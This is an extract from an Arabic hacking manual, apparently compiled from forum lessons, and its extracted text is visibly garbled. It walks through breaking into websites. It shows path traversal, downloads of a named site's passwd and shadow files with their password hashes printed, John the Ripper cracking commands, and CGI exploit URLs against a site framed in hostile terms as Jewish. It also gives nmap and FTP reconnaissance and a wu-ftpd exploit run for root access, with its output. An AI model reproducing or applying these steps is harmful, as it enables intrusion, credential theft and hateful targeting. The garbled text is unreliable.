‫السابق ذكره لختراق الموقع ‪/http://www...timduff./../.com‬‬ ‫نوع آخر ‪ ،‬يكون الستثمار )من الن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره( يكون‬ ‫الستثمار على شكل شفره )كود( مكتوب ببرنامج ‪ sh‬في ليونكس ‪ ،‬وهو ما يسمى بالعربي برنامج الغلف‬ ‫وبالنجليزي ‪ shell‬وتكون هذه الشفره تحت ملف بالمتداد *‪ sh.‬وتعمل تحت بيئه ليونكس ‪ ،‬وهذا النوع‬ ‫من الستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الداوت في ليونكس فإن لغه ‪shell‬‬ ‫اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز )‪(bat‬‬ ‫‪197‬‬ ...‬الخ‬ ‫‪ -3‬عمل جلسه للتقاط كل السكربتات ) ‪ ( Perl ..‫ما قلت هذا موقع يهودي وال بدمره وصلح عليهم عنتر ولد بو شداد ‪ ،‬أرسلت رساله لنقطه الضعف ‪،‬‬ ‫صلحت لها نسخ ولصق ‪ ،‬ورد علي بالشكر وقائمه بالغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين‬ ‫وعن العرب بدل من فكره الرهاب اللي حكوماتهم تزرعها في عقولهم‬ ‫لنأخذ مثال ‪ :‬الموقع ‪ timduff.././....././../././‬أو حتى من الممكن أن تضع بعد عنوان‬ ‫الموقع ‪ /../../../‬فقط ‪ ،‬هل عرفت ما تعرض لك هذه الخيره !‬ ‫الن سوف أضع النقاط الساسيه لكشف نقاط ضعف على موقع ما ‪-:‬‬ ‫‪ -1‬التعرف على كافه الخدمات الموجوده على السيرفر‬ ‫‪ -2‬معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان‬ ‫ذلك ممكن ‪ ،‬أو برنامج للبيع والشراء ‪./../.../.../.

‬التي يتطلبها الستثمار قبل‬ ‫تشغيله(‬ ‫عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك‬ ‫يوجد نوع ظهر مؤخرا من الستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه ‪ Perl‬ومن الممكن‬ ‫أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز )يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف‬ ‫بيرل(‬ ‫وأحيرا انواع نادره من الستثمارات قد تكون على شكل خطوات ‪..‬وليس *‪ ، C.c -o Exploit‬‬ ‫ملحظه مهمه ) يجب أن يكون المتداد للمف *‪ c..‬لو كان حرف ‪ c‬كبتل فسوف يترجم‬ ‫الستثمار وكأنه كتب في سي ‪ ، ++‬الشئ الثاني تأكد من توفر المكتبات )*‪ (h.‫ويوجد نوع من الستثمارات ثاني وهو شفره )كود( مكتوب بلغه ‪ C‬المشهوره ‪ ،‬وهذا النوع غالبا ما تحدث‬ ‫فيه أخطأ أثناء عمليه الترجمه ‪ ،‬قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ‪،‬‬ ‫ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم ‪gcc‬‬ ‫‪gcc Exploit.x Nobody:/:‬‬ ‫‪www:x:102:1001::/web:/bin/csh‬‬ ‫‪mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪sid:x:103:10::/export/home/sid:/bin/ksh‬‬ ‫‪mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪198‬‬ ..‬‬ ‫‪ = Exploit‬إستثمار‬ ‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ملف كلمة المرور معروف من إسمه ‪ ،‬هو الذي في داخله توجد حسابات الشخاص المرخص لهم بالدخول‬ ‫الى السيرفر ‪ ،‬مثل هذا‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:‬‬ ‫‪noaccess:x:60002:60002:No Access User:/:‬‬ ‫‪nobody4:x:65534:65534:SunOS 4.

com‬‬ ‫تفسير هذا السطر ‪-:‬‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫‪root‬‬ ‫هذا السطر يوضخ المستخدم واللي هو الجذر ‪root‬‬ ‫‪199‬‬ ..‬‬ ‫ بماذا يفيدني هذا الملف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ‪ ،‬ولكن لتفرح ‪!.. hwwilson.‫‪landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وقد تكون أكثر بكثير ‪ ،‬حيث أن هذا الملف الموضح بالعلى أختصر بشكل كبير ‪ ،‬فعند سحبه كان يحتوي على‬ ‫آللف السطور ‪ ،‬ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من ل يتجاوز ‪ 10‬أسطر وهي‬ ‫الموجوده بكثره ‪ ،‬على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد‬ ‫حسابات الشخاص المرخص لهم بالدخول الى السيرفر ‪......‬‬ ‫كلمة المرور تكون مشفره ‪ ،‬ل هذا ليس صحيحا تماما ‪ ،‬كانت مشفره زمان ولكن في الوقت الحالي هي‬ ‫مضلله‬ ‫*او ‪ = x‬كلمة سر مضلله ‪Shadowed‬‬ ‫‪ = EpGw4GekZ1B9U‬كلمة سر مشفره على مقياس ‪ ، DES‬هذا النوع من التشفير المستخدم في‬ ‫ليونكس و ‪ FreeBSD‬وعدد من النظمه الخرى ضعيف ‪ ،‬وهو دائما مكون من ‪ 13‬حرف ورقم كبتل‬ ‫وسمول ول يحتوي من بينها على رمز ابدًا ‪ ،‬بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع‬ ‫ضعيف أيضا‬ ‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~‬ ‫إضغط ‪ Ctrl + Shift‬في القسم اليمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ‪ ،‬ثم إذهب الى‬ ‫العلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع ‪...

‫‪x‬‬ ‫وكلمة المرور ‪ ،‬ويتضح انها مضلله ‪ ،‬يعني مكانها العلمة ‪ ، x‬ل تفكر في كسرها فهذا مستحيل ‪ ،‬لكن عليك‬ ‫البحث عن ملف ثاني تم تخزين فيه كلمة المرور ‪ ،‬ستعرف بعد قليل كيف تفعل هذا‬ ‫‪0‬‬ ‫هذا هو رقم المستخدم‬ ‫‪1‬‬ ‫رقم المجموعه‬ ‫‪Super-User:/:/sbin/sh‬‬ ‫هذا مش مهم‬ ‫‪++++++++++++++++++++++++++++‬‬ ‫الجزء الثالث‬ ‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~~~~~~~~~~~~~~~~~~~~~‬ ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو ‪ #‬أو ! وهذا مثال لها‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه‬ ‫‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫هنا تكون كلمة المرور المشفره هي ‪Q71KBZlvYSnVw‬‬ ‫الن طلعت الصوره صافيه ‪..‬‬ ‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~~‬ ‫البرامج كثيره وأشهرها هو ‪ Crack 5.‬‬ ‫‪200‬‬ ...‬‬ ‫طريقه عمل هذه البرامج ‪-:‬‬ ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ‪ ،‬كما هو موضح هنا ‪..0a‬و ‪ john the ripper‬ويوجد آخر بإسم ‪jack the ripper‬‬ ‫‪ ،‬إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ‪ ،‬عليك تنزيل ‪ ، Crack 5a‬وأفضل ‪john the‬‬ ‫‪ ripper‬لمن يريد إستخدام ويندوز ‪ ،‬وللمعولميه فإن ‪ john the ripper‬عمل أيضا تحت ليونكس ‪....

‬الخ حتى تصيب كلمة المرور الصحيحه ‪ ،‬وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ‬ ‫معك في ال ثواني فقط لن عمليه التجربه الموضحه في الرسم بالعلى ذكرت بأنه سرعة تجربه الكلمات‬ ‫يتجاوز ‪ 5000‬كلمة في الثانيه ‪ ،‬إذا لم تفلح ملفات ‪ wordlist‬حينها إذهب الى القوه العنيفه ‪brute‬‬ ‫‪force‬‬ ‫المر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق ذكرها‬ ‫‪john -i passwd‬‬ ‫‪201‬‬ ..‫‪\ -----------------------------------------------------------------------------------------------‬‬‫‪------> Q2wrtUo9LPq2R‬‬ ‫يتم مقارنه | ‪} ---> //‬البدايه{ كلمة المرور | ‪ /---/‬المشفره مع | ‪ / 1 /‬أخذ كلمة من الـ ‪ wordlist‬الكلمات‬ ‫| ‪ _____________ / 0 /‬المختاره حتى | }تشفير{‪ | | / 1 /‬يتم ‪|----\ / 0 / ---------^--------‬‬ ‫‪ | word list‬التطابق ‪-> Q6LiJ6ct1oUBz‬كلمة مرور مشفره ‪ /---/‬الكلمة المختاره | |‬ ‫_____________| ‪ \ ------song--------// ------------------‬إذا حدث تطابق فهذا يعني أن‬ ‫كلمة المرور التي كانت مشفره‬ ‫قد كسرت ‪.C)Copyright Microsoft Corp 1981-1998‬‬ ‫‪E:\Desktop\junk\john the ripper>john -w asswd passwd.pot‬الموجود في نفس الدايروكتري ‪ ،‬وعليك حذف هذا الملف إذا‬ ‫أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى‬ ‫ذلك ‪..‬‬ ‫هناك طريقه اخرى للكسر وهي تسمى بـ ‪ brute force‬أو بالعربي القوه العنيفه ‪ ،‬وهي ل تحتاج لملف‬ ‫‪ ، wordlist‬هي تقوم بتجربه كل الحروف والرقام والرموز مع بعض في خانتان و ‪3‬خانات واربع‬ ‫وخمس ‪..3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫<‪E:\Desktop\junk\john the ripper‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫وسوف تحفظ النتيجه في الملف ‪ john.‬‬ ‫| ‪ | -------------------------------------------------------------------------------‬ملحظه مهمه ‪ -:‬يتم‬ ‫عمل دوره مثل الموضحه في العلى لكسر كلمات المرور المشفره بسرعه‬ ‫}النهايه{ | ‪ 5000‬تجربه في الثانيه )إختبرنا ‪john the ripper‬على معالج بسرعه ‪(700‬‬ ‫| ‪-------------------------------------------------------------------------------‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫هذه الرسمه تعبت عليها عشان كذا ل أحد يسرقها‬ ‫لتشغيل ‪ john the ripper‬من واجه دوس نكتب المر التالي‬ ‫‪john -w:wordlist passwd‬‬ ‫حيث ‪ wordlist‬هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات‬ ‫و ‪ passwd‬هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪Microsoft(R) Windows 98‬‬ ‫‪)..txt‬‬ ‫‪by Sola 97.John the Ripper Version 1.

passwd or /etc/shadow token‬والجديد هو ‪x‬‬ ‫‪IRIX : /etc/shadow token = x‬‬ ‫‪! = AIX : /etc/security/passwd token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw token‬‬ ‫‪ token‬تعني الرمز الذي يوجد في الملف ‪ ، passwd‬وهذا يفيد في تسهيل المهمه ‪ ،‬يعني لو مثل لقيت‬ ‫علمه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في ‪ ، etc/security/passwd/‬لقد‬ ‫إستعنت بالجدول السابق ذكره ‪ ،‬مثال على ملف شادو )أكرر ملف شادو هو الملف الذي تخزن فيه كلمة‬ ‫المرور الصحيحه(‬ ‫هذا ملف ‪shadow‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫نلحظ ان كلمات السر موجوده‬ ‫الخطوه الخيره وهي دمج ملف الباسورد ‪ passwd file‬مع ‪ shadow passwd‬لنحصل على ملف‬ ‫متكامل ونقدمه الى برامج الكسر السابق ذكرها‪..‫حيث ‪ passwd‬هو ملف كلمة المرور المراد كسره ‪ ،‬إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل‬ ‫البرنامج لترى الى أين توصل ‪...hwwilson.‬‬ ‫هذا ملف باسورد حصلنا عليه من ‪http://wilsonweb2.com/etc/passwd‬‬ ‫‪-----------------------------------------------------------------------------------------------‬‬‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬ ‫‪202‬‬ ..‬‬ ‫ ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~‬ ‫دائما سوف تواجه كلمة مرور مضلله ‪ ،‬لكن هناك طريقه تسمى ‪ Unshadow‬لحل هذه المشكله !!‬ ‫إذا واجهت ملف مضلل عليك البحث عن ملف ثاني يسمى ملف الشادو )ملف الظل( ‪shadow file‬‬ ‫وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ‪ ،‬اليك الجدول التالي ‪:‬‬ ‫‪* = Linux : /etc/shadow token‬‬ ‫‪ = SunOS : /etc/shadow token‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪ * = FreeBSD : /etc/master.

gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976:::::: jerome:XDqnOl32tPoGo:10976:::::: ::::::erl:0jE9Xem4aJYeI:10982:::::: landmark:0jCgWu6vl8g0s:11185 -----------------------------------------------------------------------------------------------‫ وهكذا مع جميع الحسابات‬، ‫ في ملف الباسورد‬x ‫نقوم بنسخ كلمات السر الموجوده فيه ولصقها مكان علمه‬ ‫لنحصل على ملف لمة مرور كامل ومتكامل ونقدمه الى برامج الكسر‬ -: ‫ملحظه مهمه‬ .html ‫أرشيف لثغرات‬ /http://www..com/etc/shadow ‫لنحصل على الملف‬ -----------------------------------------------------------------------------------------------root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: www:WJctaI.hwwilson.com/exploits/archive..com 203 .com ‫ الكثير‬+ ‫أرشيف ثغرات‬ /http://www.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515:::::: mirror:iMPWwbrU.8rcSe2:10507:::::: mirrors:gg9p.Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: :/:nobody4:x:65534:65534:SunOS 4. ‫ يعني تربتها لتتعرف عليها برامج الكسر‬، ‫عليك جعل كل حساب في سطر‬ -: ‫مواقع تستحق الزياره‬ ‫أرشيف لثغرات‬ www.ussrback.secureroot.securiteam.x Nobody www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh -----------------------------------------------------------------------------------------------‫ نعرف من خلل الجدول السابق ذكره بأن كلمة المرور الصحيحه في‬x ‫ الموضح واللي هو‬token ‫ومن الـ‬ etc/shadow/ ‫الدليل‬ ‫إذن نتوجه بالمتصفح الى‬ http://wilsonweb2.

warez.insecure.secureroot.com insecure /http://www.sk Security Search Engine /http://www.com/Hacking ‫محرك بحث ل غني عنه‬ www...ound/search..co.com Hacking (‫(ممتاز لمن يريد البدايه‬ /http://www.com-Underground /http://www.www.org <XMP></BODY></HTML/> http://public..uk/cgi.‫أرشيف ثغرات‬ /http://www.box.hitboss.bugs2k.ail/formmail.easynet.com ‫أرشيف ثغرات‬ /http://www.rootshell.com/resources/s.com ‫مواقع لثغرات‬ www.pl ،،،‫انتهى‬ " (‫" اختراق المواقع )الجزء الثالث‬ 204 .undergroundnews.ussrback.com/category/exploits ‫دليل لمواقع الهاكينق‬ www.neworder.asp Warez.

.‬‬ ‫من خلل قرائتي للعديد من تكست الثغرات رغم قدامتها تبين لي عدة امور‬ ‫* لن تخترق الموقع )‪ (host‬اللي مستضيفه السيرفر حتى تمتلك اليوزر والباسوور وهذا شيء طبيعي‬ ‫* لن تخترق السيرفر حتى تمتلك ملف الصلحيات )‪ (passwd‬اللي هو حق الحسابات للمواقع المستأجره‬ ‫عند السيرفر بس سؤالي اللي محيرني ان الملف واقع تحت مجلد اسمه اي تي سي ‪/etc/passwd‬‬ ‫احيان يكون اسمه ‪ shadow‬ويعني ان كلمة المرور نجمه او اكس او علمة تعجب اما ‪ passwd‬فتأتي‬ ‫فيه‬ ‫الكلمه مشفره وتستخدم لها ‪ john the ripper‬اللي يفك تشفيرها طبعا ملفات الشادو مالك امل للحين‬ ‫على حسب علمي مافيه برنامج لها ؟؟؟‬ ‫فيه سؤال هنا اللي نعرفه ان كل ملف له امتداد بس ليش الملف ذا ماله امتداد ؟‬ ‫واذا حصلت الملف باي طريقه كانت ؟؟ باي صيغه احفظه هل يحفظ كتكست ام )‪ (pwd‬او )اي صيغه( ؟‬ ‫بعدين فيه سؤال ثاني المجلد اللي فيه الملف من مجلدات اليونكس ؟ لنه كما معروف ان اليونكس‬ ‫له ست مجلدات‬ ‫‪ bin‬خاص بالملفات الثنائيه يعني اللي تشغل النظام‬ ‫‪ etc‬ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او ‪passwd‬‬ ‫‪ dev‬ملفات الجهزه‬ ‫‪ lib‬مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل‬ ‫‪ tmp‬الملفات الموقته او غير الثابته‬ ‫‪ usr‬اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام‬ ‫هل يعني ذلك لو ان السيرفر فيه نظام ‪ nt‬اقدر انزل الملف منه ؟ وان المجلدات نفسها اللي باليونكس‬ ‫‪205‬‬ .‬‬ ‫في الحقيقه موضوع الثغرات بسيط جدا مثل ما انا قريت عنه بس‬ ‫يبي متابعه وشوية جهد انا ساطرح بعض السئله لعل الخوان المشرفين‬ ‫او الكتاب يساعدونا في الموضوع ‪....‬فليس عيبا طلب العلم‬ ‫انما العيب الجهل والتعالي بالعلم نحن نتعلم ل لنجابه العلماء بل‬ ‫لننفع امتنا ونرفع رايتها ونقف في وجه من يعاديها ‪..‬وبسيط جدا جدا لنه من صنع البشر‬ ‫كوني احد العضاء في هذا المنتدى وجديد في باب الختراق عن طريق الثغرات‬ ‫وحتى تحصل الفائده للجميع ونتعلم من بعض ‪....‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫اخواني عالم الختراق كبير جدا ‪...

cgi‬بحيث تصبح الخطوات بعد‬ ‫تجميعها‬ ‫‪ http://www.cgi‬الكلم هذا كله في المستعرض عندك في حقل‬ ‫الدرس العنوان‬ ‫انا نسيت اقول حاجه ماني متأكد منها لعل من يعلق على الموضوع ان كانت غير صحيحه يصححها‬ ‫ان ممكن تكون الثغره بمجلد ثاني اسمه ‪ scripts‬وتصبح الثغره السابقه‬ ‫‪http://www.cgi‬‬ ‫‪ scripts‬خاص بسيرفرات فيها ‪winnt‬‬ ‫‪ cgi-bin‬خاص بسيرفرات يونيكس او ايريس او لينكس‬ ‫للمعلوميه المجلدات السابقه توضع فيها الملفات التنفيذبه من جهة السيرفر مثل البلت جافا‬ ‫اما ملفات السكربت جافا تنفذ على جهازك مثل اللي تطلع في المستعرض‪.‬‬ ‫انتهى‪،،،‬‬ ‫" درس في اختراق المواقع )متوسط( "‬ ‫‪206‬‬ .jewish.‫زي اللي موجوده في ‪ nt‬ام تختلف واسم الملف يختلف ‪ admin.org‬نفعل التالي‬ ‫‪ /http://www.org‬ثم نكتب ‪ /cgi-bin‬ثم الثغره ‪ php.pwd‬مثل‬ ‫* بالنسبه لطريقة الثغرات تعني الطرق للوصول للملفات السابقه او ملفات اخرى‬ ‫ومن اشهرها ثغرات السي جي اي نسبة للمجلد ‪ cgi-bin‬او ملفات من امتداد ‪cgi‬‬ ‫ماعلينا ليش سموها ؟؟؟‬ ‫طيب وشلون نتعامل مع الثغره والموقع ببساطه شديده لنفترض ان لدينا ثغره ‪ php.jewish.org/cgi-bin/php.org/scripts/php.jewish.jewish.cgi‬ونريد‬ ‫تطبيقها على موقع ذو دومين نيم يعني مو مستضاف مثل ‪ /http://www.

gz (1‬‬ ‫‪cd nmap (2‬‬ ‫‪configure && make && make install/.target.3‬‬ ‫‪ -5‬شوف الخدمات اللي بيقدمها الموقع و كمان شوف نظام التشغيل متبعا التالي ‪-:‬‬ ‫"‪"nmap -sS -O 196.1.1.3‬‬ ‫‪( /Starting nmap V.2.2.org/nmap‬‬ ‫‪:(Interesting ports on www...com/~weld/netcat‬‬ ‫الخطوات ‪-:‬‬ ‫‪ -1‬ركب الينكس و خش عالنت )مش قلتلك مفيش احسن من اللينكس ‪( P:‬‬ ‫‪ -2‬ركب الداه ‪ nmap‬متبعا التالي ‪:‬‬ ‫*‪tar zxvf nmap. host.com‬‬ ‫‪ -4‬شوف الي بي تبع الموقع باستخدام‬ ‫‪nslookup www..com‬‬ ‫هذا سوف يعرض لك الي بي للموقع و ليكن ‪196.1.insecure. traceroute.‬في ناس تانيه ماتحبش اللينكس فالشيل اكاونت كويس لها و ممكن يمشي‬ ‫انا عن نفسي مش حاستعمل التنين ‪(:‬‬ ‫بس بالنسبه للي حيستعملو الشيل لزم يتاكدو انه بيسمح بالبرامج الساسيه زي‬ ‫‪nslookup.‬‬ ‫*المواقع المرتبطه بالموضوع ‪:‬‬ ‫‪(a) Linux (http://www. dig.‬دور و لو مالقيتش قولي و انا اديلك كام موقع‬ ‫تجيب منه الحاجات دي‪...l0pht.2. (3‬‬ ‫‪-3‬شوف الموقع المستهدف و ليكن ‪.tar.‬‬ ‫‪www.‬يا عم ركب لينكس و ريح نفسك (‬ ‫و طبعا الدوات دي ‪ nmap and netcat‬و اخر حاجه هي الكسبلويت ‪.2. ftp‬‬ ‫و اساسي لزم ال ‪ gcc‬عشان تعرف تعمل كومبايل‪)..‬مش حناقش كيفيه‬ ‫الحصول على واحد لن فيه مواضيع كثيره اتكلمت عليه‪..‬اذا بحثت في جوجل سوف تجد الكثير من الشيلز‬ ‫طبعا الناس المحترمه )احمممم( بتركب لينكس او يونيكس و تعيش حياتها و تريح‬ ‫نفسها‪.target. ssh.‬‬ ‫‪ -2‬اداه ال ‪ nmap‬هي عباره عن بورت سكانر متقدم‬ ‫‪ -3‬ال ‪ NetCat‬هي اداه شبيه بالتلنت و تقوم برفع بيانات لسيرفير معين‬ ‫‪-4‬الكسبلويتات هي عباره عن برامج غالبا تكون مكتوبه بلغه السي و هي تقوم‬ ‫باعطائك كافه الصلحيات فهي تخترق جهاز معين و تقوم بعمل كل شيء انت تريده‬ ‫ممكن تلقيها فين؟؟؟‬ ‫مواقع السيكيوريتي على افه من يشيل‪.. 2.com‬‬ ‫‪(b) Nmap (http://www.1.telnet.‬‬ ‫*بعض الملحوظات الهامه ‪:‬‬ ‫‪-1‬الشيل اكاونت شبيه جدا بالدوس مع اختلف في الوامر و الوظائف ‪.3‬‬ ‫)‪(The 1531 ports scanned but not shown below are in state: closed‬‬ ‫‪207‬‬ ...org‬‬ ‫‪(/c) NetCat (http://www.target.54BETA22 ( www...insecure.‫>ةةةةة<‬ ‫>ةةةةةة‪< ICER :‬‬ ‫الدوات المطلوبه ‪ :‬شيل اكاونت ‪. ping.3‬‬ ‫المفروض انه يديك مخرجات شبه الكلم ده ‪-:‬‬ ‫‪root@IcEr:~# nmap -sS -O 196.com (196.slackware..

1..Port State Service tcp open ftp/21 tcp open smtp/25 tcp open http/80 tcp open sunrpc/111 tcp open auth/113 tcp open printer/515 tcp open unknown/963 tcp open kdm/1024 tcp filtered krb524/4444 tcp open X11/6000 tcp filtered napster/6699 OS guess for host: Linux 2.be confusing your ftp client-230 -230 208 .1.14-2..16 (Uptime 0.2.Guest login ok.3" ‫اي منهم حيديك بانر فيه الفيرجين بتاعه الف تي بي ديمون اللي شغاله على السيرفير‬ : ‫ممكن يكون زي كده‬ root@IcEr:~# ftp 196.1 IP address (1 host up) scanned in 67 seconds #~:root@IcEr (: ‫تمام كده يا شباب‬ .6.3 21" ‫او‬ "ftp 196.pandora.1.1.‫الكلم ده كله عباره عن استكشاف للموقع يوريك البورتات المفتوحه‬ daemon ‫شغال على الموقع و ل ل في المثال اللي فوق حنلقيه موجود و ده كويس‬ -: ‫ موجوده متبعا التالي‬FTP daemon ‫شوف اي فيرحين من‬ "telnet 196. send your complete e-mail address as password 331 :Password Welcome.target.2.. please report them via e-mail to-230 root@IcEr.com FTP server (Version wu-2.Connected to 196. If have-230 any unusual problems.this will turn off the continuation messages that-230 may .2. archive user! This is an experimental FTP server.3 www.ready Name (target:root): anonymous . please try using a dash (-) as the first-230 character of your password -.2.3 .net If you do have problems.160 days (since Mon Apr 30 14:51:06 2001 Nmap run completed -.2.‫نكمل‬ FTP ‫ممكن تشوف لو كان فيه‬.0(1) Mon Mar 6 13:54:16 220 (SAST 2000 .2.

6.0 ‫من الكلم ده تقدر تعرف ان الفيرجين الموجوده هي‬ (...loggin into system USER ftp . access restrictions apply 230 .Guest login ok. ‫ الموجوده‬annonymous ‫لو لحظت اننا استغلينا خاصيه ال‬ 209 .Remote system type is UNIX . ‫ و كانت اعمليه ناجحه‬anonymous ‫و ايضا احنا حاولنا نخش كمجهولين‬ ####### ‫ صلي على الحبيب المختار‬####### -: ‫ مش فاكر المهم انها اهم خطوه‬8 ‫ او‬7 .Guest login ok.2 (?) with wuftpd 2.c ‫و لتكن‬ red hat 6.3 Target: 196. ‫طبعا انا نسيت امر الكومبايل‬ man gcc ‫بكل الخيارات اللي معاه‬.2. this will take about 10 seconds Press ^\ to leave shell Linux lame_box.1.2 ‫المهم لو شفت السورس كود بتاعها حتلقي انها متكوده عشان نظام تشغيل معين و ليكن‬ ‫و يا سلم لو كان الموقع المستهدف بيعمل على نظام التشغيل ده‬ ‫كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر‬ root access ‫الموقع المستهدف و كده حيديك‬ (-./wuftpd2600 -t -s 0 196.net -230 .wu-2.Guest login ok.1.Using binary mode to transfer files ftp>by #~:root@IcEr ..14-5. Shellcode: 152 .. AddrRetAddr: 0xbfffb028....3 (ftp/<shellcode>): RedHat 6..02:01.U will find what U wanna . send your complete e-mail address as password 331 <PASS <shellcode Next time please use your e-mail address as your password-230 for example: icer@ae. magic number already exists: [[87. ‫محدش سالني اعمل بالنت كات بعد كده‬. ‫اه نسيت‬.2.01:02.‫بعض الثغرات بتحتاجه‬.FTPd ‫احصل على الكسبلويت بتاعه الفيرجين ديه من‬ ( ‫)اللي يعمل سيرش ميتوهش‬ wuftpd2600.za. ‫و هوه حيديلك معلومات كامله عن امر الكومبايل‬ (: ‫كده يبقى انا كده عملت اللي عليه‬ ‫محدش يسالني باه 